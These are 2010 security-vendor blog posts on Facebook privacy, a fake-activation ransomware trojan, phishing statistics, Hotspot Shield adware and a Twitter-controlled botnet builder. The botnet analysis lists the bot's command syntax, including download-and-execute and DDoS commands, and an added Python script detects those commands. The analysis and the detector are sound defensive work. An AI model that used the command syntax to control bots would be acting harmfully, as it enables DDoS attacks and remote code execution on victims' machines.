Is Facebook affected by the privacy debate?

Short answer: no, it’s just a numbers game.

The debate is continuing over Facebook’s lack of concern for users’ privacy and its strangely difficult procedures for managing users’ privacy settings.

Graham Cluley at the UK AV firm Sophos (http://www.sophos.com/blogs/gc/) drew the world’s attention to the fact that the Google Trends page is showing a spike in searches for the string “delete Facebook account.” The spike is still getting steeper.

What it shows is that there are nearly 30 times as many searches as there were at the lowest period represented in early 2009. It doesn’t say what the absolute numbers are; it just shows a huge increase in the RATE. If one person ran the search in 2009, there could be only 30 people checking it this week. It also doesn’t indicate whether the Googlers are finding anything useful or actually deleting their Facebook pages.

Diaspora

Meanwhile, the Diaspora group (http://www.joindiaspora.com/), four college students who set out several weeks ago to raise some cash to support themselves while they write “the privacy aware, personally controlled, do-it-all distributed open source social network,” is getting far more pledges of support than just the $10,000 they set out to raise.

Just say “No” to Facebook

A protest site, QuitFacebookDay.com (http://www.quitfacebookday.com/), has meanwhile begun pushing the idea of users leaving Facebook. As of this afternoon, 3,466 people had committed to quit.

But, the big number

To put all this in perspective, we have a headline from the AllFaceBook.com blog (which is not connected to Facebook): http://www.allfacebook.com/2010/05/facebook-prepares-to-announce-500-million-users/#more-14403

“Facebook Prepares To Announce 500 Million Users”

Nick O’Neill writes there: “Facebook is working on plans for their 500 million user celebration, projected to take place at some point before the end of June.”

And this:

“Before the end of this year, the company should near the 600 million user mark and surpass $1 billion in annualized revenue.”

With numbers like that, Facebook’s privacy policy can probably be summed up in a couple of sentences — something like: “We don’t care. We’re so big we don’t have to.”

Tom Kelchner

Windows “activation” ransomware

Trojan-Ransom.Win32.Winac.A

Our analyst Adam Thomas found this: a piece of ransomware that locks up Windows until you enter your credit card data.

First it claims you are running a pirated version of Windows and they need your billing details. “…but your credit card will NOT be charged.”

And of course that’s true.

Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate:

Basically, the Trojan locks your system. The only thing you can do is complete the “activation.” You can choose to “activate windows” or “do it later.” If you choose to do it later, your machine reboots.

If you go through the process of entering your data (including your credit card number), then your system will work again.

Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it.

VIPRE detects it as Trojan-Ransom.Win32.Winac.A

Thanks Adam

Tom Kelchner

 

Privacy: Facebook, we have a problem

1. Google Trends are showing an increased interest in deleting Facebook accounts.

Google’s “Trends” site shows an interesting graph of people doing searches for “delete Facebook account”
(http://www.google.com/trends?q=delete+facebook+account)

What the graph is showing is that there are ten times as many searches for “delete Facebook Account” recently as there were in 2008. The rate has been rising through 2009 and is rising at a much steeper rate recently.

2. The Diaspora group is attracting a lot more money than they set out to raise

On Tuesday we blogged about the four New York college students who set out to raise $10,000 on the KickStarter site to pay for pizza and Mountain Dew over the summer while they write a “privacy aware, personally controlled, do-it-all distributed open source social network” that they are calling “Diaspora.”

We checked the KickStarter page for Diaspora then and wrote: “As of mid-afternoon today their web site said they’d raised $33,179 from 1027 backers. They had been seeking $10,000 to support themselves over the summer while they finished the project.” http://sunbeltblog.blogspot.com/2010/05/nyu-students-building-open-source.html

Well, that was three days ago. Here is what the KickStarter page says for Diaspora today:

These guys only set out to get $10,000! They’re up to $142,104 and the number is climbing by the minute!

Facebook has 350 million subscribers, so it’s not like Farmville is going to become a ghost town overnight and there won’t be anybody left to bring in the fall harvest. However, the data above is starting to point to a trend and should be Facebook’s wake-up call about the privacy issue.

Tom Kelchner

APWG report: one gang did two-thirds of all phishing in 2H09

Number of attacks doubled in second half of year, but dying out in 2010

The Anti-Phishing Working Group has released its “Global Phishing Survey: Trends and Domain Name Use 2H2009.” Highlights include:

— The Avalanche phishing gang was behind two-thirds of the 126,697 phishing attacks launched in the second half of last year.

— The uptime of phishing attacks continues to drop because of the response to Avalanche. Avalanche phish have half the uptime of non-Avalanche domains.

— APWG estimated that there were at least 126,697 phishing attacks in the second half of the year and 55,698 attacks in the first half.

— Phishing remains concentrated in just four top-level domains: 76 percent of the attacks occurred in .COM, .EU, .NET, and .UK.

— Eighty-eight percent of the malicious domain registrations were made in just five top-level domains: .BE, .COM, .EU, .NET and .UK.

Avalanche is on the decline though. The report says: “Avalanche domain registrations hit a high in December 2009, but by then Avalanche was hosting fewer and fewer attacks overall. By March 2010, Avalanche was hosting only one phishing attack on each domain it registered, and attacks dwindled to just 59 in the month of April 2010.”

Report here: http://www.antiphishing.org/reports/APWG_GlobalPhishingSurvey_2H2009.pdf

Tom Kelchner

AnchorFree Responds on HotSpot Shield, our response

AnchorFree’s response to our blog post:

Hey Tom,

This is Art from Hotspot Shield. I work for the marketing department.

I wanted to bring to your notice that users don’t start seeing ads just by downloading/installing Hotspot Shield. They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services. We are very upfront about this to our users.

Once they disconnect, they go back to the normal browsing without any ad insertion. User is informed that HotspotShield is supported by advertisements before the download and at the start of each private browsing session.

Also, we never store real user IP address and never provide real user IP to any advertiser. Therefore, neither we nor our advertisers can disclose real IP of our user even if compelled. Although I agree that it is not very clear in our privacy policy. But we never store/share any users’ personal data. We limit list of our advertisers to only ones who agree NOT to receive real user IP.

Feel free to email me or call me if you have any questions.

Cheers,
art


Our response from Eric Howes, Sunbelt Spyware Research Manager

Art:

I’m sorry, but nothing in your response changes our conclusion that Hotspot Shield is adware and that it is being presented to users in a deceptive manner. Let’s look at your claims one by one.

“They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services.”

Most adware vendors can and have made similar claims. The term “adware” was, in fact, coined to describe products that are ad-supported.

“We are very upfront about this to our users. Once they disconnect, they go back to the normal browsing without any ad insertion.”

There is nothing straightforward, clear, or conspicuous in the disclosures you offer users concerning the ad-supported nature of the product or the fact that ad networks can use (and undoubtedly are using) tracking technologies to monitor users’ response to ads and personalize those ads.

“User is informed that HotspotShield is supported by advertisements before the download and at the start of each private browsing session.”

Neither of these claims is true. There is no notice on the Hotspot Shield home page or download page that the product is ad-supported. To the contrary, the home page sports that flashy green “no adware/spyware” logo, leading users to believe that quite the opposite is true. Although there is a link to the “terms of service,” that link is at the bottom of the page (the download link is at the top right), and even then users must scroll down to section 9 to find any mention of advertisements.

The installation/setup process similarly lacks any notice of these material terms outside of the EULA. Curiously, there is a separate screen for the optional toolbar (presented to users as a means of helping AnchorFree keep the product free for use), but nothing equivalent for the advertising functionality of the core program itself.

Finally, what the user sees at the start of each private browsing session is a connection status message that, again, makes no mention of the ad-supported nature of the product.

It should also be noted that even though I carefully unchecked all the options to have AnchorFree take over my home page, search, and error page settings, my browser’s home page was still hijacked to the AnchorFree “privacy search” page at the start of each “private browsing session.”

“Also, we never store real user IP address and never provide real user IP to any advertiser. Therefore, neither we nor our advertisers can disclose real IP of our user even if compelled. Although I agree that it is not very clear in our privacy policy. But we never store/share any users’ personal data. We limit list of our advertisers to only ones who agree NOT to receive real user IP.”

The real problem is that AnchorFree goes out of its way to create user expectations that are entirely opposite of the true ad-supported functionality of the product. Moreover, it’s fairly well established at this point that users’ true identities (or something very close to them) can, given enough data, be derived from the browsing profiles created via the tracking technologies used by major ad networks.

The key test or question in this case is a simple one. AnchorFree promotes Hotspot Shield as a means for “protecting your privacy, security, and anonymity on the web.” What would users think if they knew that the very first thing AnchorFree does after users start a “private browsing session” is hand them over to invasive advertising networks? I think they would be appalled.

Eric Howes
Sunbelt Software

What part of “no adware” don’t you understand?

We’ve gotten some inquiries about why VIPRE has been detecting Hotspot Shield (http://www.hotspotshield.com/) as adware since May 4. Some thought it might be a false positive. It isn’t.

The Hotspot Shield web site carries the below graphic that says “NO spyware / adware.”

Well just SAYING “NO spyware / adware” doesn’t make it happen.

Here’s what the Hotspot Shield “terms of service” say (http://hotspotshield.com/terms/):

“9.1 Advertisements. AnchorFree may deliver third-party advertisements (“Advertisements”) within the content of any web page accessed. Advertisements may be injected into the top of the page, inserted directly into the page content, or even displayed to overlay the page. You hereby acknowledge and consent that AnchorFree may alter the content of any web page accessed for the purpose of displaying Advertisements. Additionally from time to time, AnchorFree may prevent any user’s access to the product or continued use thereof until such user has successfully participated in applicable advertising programs, surveys, or other activities that collect and monetize users’ personal information. AnchorFree does not endorse any information, materials, products, or services contained in or accessible through Advertisements.”

It also says: “AnchorFree allows other companies, called third-party ad servers or ad networks, to serve advertisements within the Hotspot Shield. These third-party ad servers or ad networks use technology to send, directly to your browser, the advertisements and links that appear on the Hotspot Shield. They automatically receive the virtual IP Address assigned by AnchorFree when this happens. They may also use other technologies (such as cookies, javascript, or web beacons) to measure the effectiveness of their advertisements and to personalize their advertising content.”

This from a company that claims to be “Protecting the web for your security, privacy and anonymity!”

Eric Howes, Sunbelt Software Spyware Research Manager, said on the Sunbelt Support Forum:
http://supportforums.sunbeltsoftware.com/messageview.aspx?catid=76&threadid=4649&enterthread=y

“If a company is injecting ads into the user’s browser and onto the user’s desktop and using tracking technology to “personalize” those advertisements, then it is most certainly delivering adware/spyware to users, and any disclaimers to the contrary are simply deceptive.

“That’s why we added the detection for Hotspot Shield. If you want to continue the program yourself, that’s your decision. But this detection is not a false positive.”

Tom Kelchner

XP (SP2) support ends July 13

If you’ve been squeezing the last bit of value out of that installation of Windows XP Service Pack 2 or are continuing to run it because of proprietary software that you’re squeezing the last bit of value out of, well, you only have two more months of squeezing. Microsoft will end support for Service Pack 2 on July 13.

Now if you can somehow upgrade to Service Pack 3, you can forget about the problem until Microsoft’s Extended Support for XP ends April 8, 2014, assuming the hard drive in that PC you bought in 2001 lasts that long. Meanwhile, I wouldn’t slack off on the backups.

And, no, July 13 isn’t on a Friday.

Support for Windows XP Service Pack 2 ends on July 13, 2010

Microsoft’s page on this is here.

Tom Kelchner

Will Facebook face up to privacy risks?

AllFaceBook.com (not a Facebook company web site) is reporting that insider contacts say Facebook has called an all-hands meeting today to discuss the company’s privacy strategy.

With the many controversies stemming from Facebook’s cavalier attitude to users’ personal data security, it has been conjectured that the social media giant might adopt an “opt-in” policy for features that share users’ information.

Blog post here: “Facebook Calls All Hands Meeting On Privacy”

The Electronic Freedom Foundation posted (in April) a great timeline of Facebook’s changing security policy statements over the last five years: “Facebook’s Eroding Privacy Policy: A Timeline”

Tom Kelchner

U.S. Fed judge rules against LimeWire

ArsTechnica is reporting that U.S. Federal Judge Kimba Wood of the United States District Court for the Southern District of New York has granted summary judgment against LimeWire in an action brought by the Recording Industry Association of America (RIAA), which claimed the peer-to-peer file-sharing service was facilitating copyright infringement.

Penalties against LimeWire and its CEO Mark Gorton will be set after a status conference on June 1.

During the legal proceedings, an expert witness called by the RIAA testified that in a sample of 1,800 LimeWire files he examined, 93 percent were copyrighted.

In other testimony it was revealed that LimeWire had opened a digital music store and used filtering to prevent users from sharing digital recordings purchased from it, but didn’t filter to prevent them from sharing anything else.

“In Wood’s view, this all adds up to a business model knowingly built on copyright infringement, and it continued with no attempt to address the massive problem,” according to the article in ArsTechnica (“LimeWire sliced by RIAA, guilty of massive infringement”).

More coverage here in Wall Street Journal: “CopyWrong! Kimba Wood Squeezes the Juice Out of Limewire”

This is big news for LimeWire users who never knew you were supposed to pay for music and the artists and recording companies who would like them to learn.

Tom Kelchner

U.S. privacy bill: geolocation tracking, targeted ads might be issues

The Washington Post is carrying a story and video of Pam Horan, president of the Online Publishers Association, discussing the draft privacy bill that Rep. Rick Boucher (D-Va.) and Rep. Cliff Stearns (R-Fla.) introduced last week. (See Sunbelt Blog pieces here, and here.) Cecilia Kang on her Post Tech blog asked Horan to post one question to Boucher about the bill.

Horan said the Online Advertisers’ biggest concern is how the ultimate wording of the bill will define “precise geolocation information.”

Information about a person’s location falls in the category of “sensitive information” in the bill, and advertisers would not be allowed to collect that data unless users opted in.

Horan said with users buying more portable devices such as the iPad, advertisers would like to be able to deliver coupons and ads for businesses near them using global positioning technology.

“This can all be done in a way that is non-identifiable and is a huge opportunity for us,” Horan said.

Story and video here: “Online publishers question Boucher privacy bill”

According to Hillicon, the technology blog of The Hill web site, Boucher said today that the bill is not an attempt to inhibit responsible targeted advertising.

At this point the draft bill requires companies to disclose the fact that they collect information from consumers and port the information into Web ads. Those that fail to make proper disclosure could face penalties from the Federal Trade Commission.

The next draft of the bill could be complete by the middle of next month.

The Information Law Group posted a great analysis of the draft bill today here: “Breaking Down the Boucher Bill”

Tom Kelchner

The DIY Twitter Botnet Creator

At the tail end of last year, Botnets controlled by Twitter accounts started to make the news. They’ve kind of faded from view a little since then, but one enterprising coder is hoping they’ll make a comeback with a tool designed to make botting simple for script kiddies the world over.

This is the builder we’ll be looking at today:

twitter bot builder

Firing the program up gives the most basic of interfaces – all you can do is enter a Twitter Username and hit the “Build” button:

bot builder

Once done, an executable file is created that will keep an eye on the named Twitter account for a series of commands used to infect, download, attack with DDoS and even kill the connection between Bot and Command channel. This is the file that’s created:

infection file

Of course, the attacker will change the name and the icon before attempting to send it to a victim. Should an end-user infect themselves, the attacker simply posts one of the following commands to their Twitter feed and the Bot will happily oblige:

twitter bot command

.VISIT*link.com* (The attacker can add a 0 at the end to repeatedly open a weblink in an “invisible” manner, or a 1 if they want to pop open a website for giggles on the infected PC. Above, you can see a Twitter account telling all bots to open up Google.com in a visible web browser).

.DDOS*IP*PORT (This is a UDP attack).

.SAY* (This one takes advantage of the text to speech feature on a Windows machine, babbling a phrase of choice at the confused victim).

.DOWNLOAD*link.com/file.exe* (The attacker can add a 0 at the end to download, or a 1 if they want to download and execute a file).

.STOP (This will tell the Bots to cease their activities, regardless of whether that’s a DDoS attack or a world record attempt for the amount of times they can open up a Rickroll).

.REMOVEALL (This cuts the connection between bot and Twitter account).

Here’s a screenshot of Youtube popped open on an infected PC courtesy of a .VISIT command – note the shot of the Wireshark traffic indicating the bot / Twitter connection just before the browser opens:

twitter bot youtube popped

All in all, a very slick tool and no doubt script kiddies everywhere are salivating over the prospect of hitting a website with a DDoS from their mobile phones. However, something to keep in mind: anyone using this as an attack method is horribly exposed.

For one thing, this doesn’t work if the person controlling the bots attempts to hide their commands with a private Twitter page; the bots will just flail aimlessly as they wonder where their master has gone. There are two side effects of “being public” as a result:

1) In theory it should be easy for Twitter to track / filter / block anyone issuing these commands – and security researchers on Twitter who go hunting for these things will probably ensure offending accounts are reported and banned.

2) It only takes a quick Twitter Search to reveal who is using this Bot method at the moment:

bot commands

Even better, things get extremely complicated if you’re apparently posting Bot commands from a Twitter feed that contains your full name, your geographic location and a link to your homepage that gives up your home address & phone number from a Whois search.

bot feed

whois

Whoops.
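Because the commands have to be posted publicly in a fixed syntax, filtering for them is straightforward. The following is an added example, not code from the bot or from Twitter: a minimal matcher for the command grammar listed above, run over constructed sample posts. The account names, the sample posts, the `min_hits` threshold and the choice to match only posts that consist of a single command are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Command grammar as listed in the post. The trailing 0/1 mode digit on
# .VISIT and .DOWNLOAD is optional because the post says it "can" be added.
COMMAND_PATTERNS = {
    "VISIT": re.compile(r"^\.VISIT\*(?P<url>[^*\s]+)\*(?P<mode>[01])?$"),
    "DOWNLOAD": re.compile(r"^\.DOWNLOAD\*(?P<url>[^*\s]+)\*(?P<mode>[01])?$"),
    "DDOS": re.compile(r"^\.DDOS\*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\*(?P<port>\d{1,5})$"),
    "SAY": re.compile(r"^\.SAY\*(?P<text>.+)$"),
    "STOP": re.compile(r"^\.STOP$"),
    "REMOVEALL": re.compile(r"^\.REMOVEALL$"),
}

def classify(text):
    """Return (command, fields) if a post is exactly one bot command, else None."""
    candidate = text.strip()
    for name, pattern in COMMAND_PATTERNS.items():
        match = pattern.match(candidate)
        if match:
            fields = {k: v for k, v in match.groupdict().items() if v is not None}
            return name, fields
    return None

def flag_accounts(posts, min_hits=2):
    """Group matching posts by account; keep accounts with >= min_hits commands."""
    hits = defaultdict(list)
    for account, text in posts:
        result = classify(text)
        if result:
            hits[account].append(result[0])
    return {acct: cmds for acct, cmds in hits.items() if len(cmds) >= min_hits}

# Constructed sample posts (account, text); not real accounts or real traffic.
SAMPLE_POSTS = [
    ("example_acct_a", ".VISIT*example.com*1"),
    ("example_acct_a", ".STOP"),
    ("example_acct_b", "Reading about the .VISIT*link.com* syntax in a blog post"),
    ("example_acct_c", ".DDOS*192.0.2.10*80"),
    ("example_acct_c", ".DOWNLOAD*example.com/file.exe*0"),
    ("example_acct_c", ".REMOVEALL"),
    ("example_acct_d", ".SAY*hello"),
]

if __name__ == "__main__":
    for account, commands in flag_accounts(SAMPLE_POSTS).items():
        print(account, commands)
```

Anchoring each pattern to the whole post keeps ordinary discussion of the syntax (the `example_acct_b` post) from being flagged, and the per-account threshold leaves a single stray match unreported.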

We’ve notified Twitter about this bot creation system, and they’re looking into it. I’d also like to point out that they took exactly thirteen minutes to respond to my email, which is rather impressive by any standards.

We detect the infection file as Hacktool.win32.Twebot.A.

Christopher Boyd